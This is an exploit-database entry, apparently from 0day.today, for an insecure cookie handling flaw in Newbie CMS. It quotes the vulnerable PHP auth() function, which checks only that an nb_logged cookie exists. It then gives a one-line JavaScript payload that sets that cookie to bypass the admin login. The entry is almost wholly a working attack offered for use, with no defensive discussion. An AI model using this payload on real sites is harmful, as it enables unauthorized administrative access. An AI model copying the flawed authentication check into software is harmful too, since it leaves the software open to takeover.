id: 11078
date: 02/25/2010
title: Newbie CMS insecure cookie handling vulnerability
author: JiKo
cves: 

=================================================
Newbie CMS insecure cookie handling vulnerability
=================================================

----------[exploit Debut]
[ Insecure Cookie Handling Vulnerability]
----------[Script Info]

Moi    : JIKO

----------[Script Info]

Site        : http://newbie-cms.com
Download    : http://newbie-cms.com/free_download.php?file=newbiev003.zip

----------[exploit Info]

>>|~[Info]
    code :( : admin/config.php
        function auth()
            {
            if (!isset($_COOKIE["nb_logged"]))
            {
            header("location:login.php");
            exit();
            }
            }
    exploit :
javascript:document.cookie="nb_logged=jiko;path=/newbb/admin/";




#  0day.today [2023-03-24]  #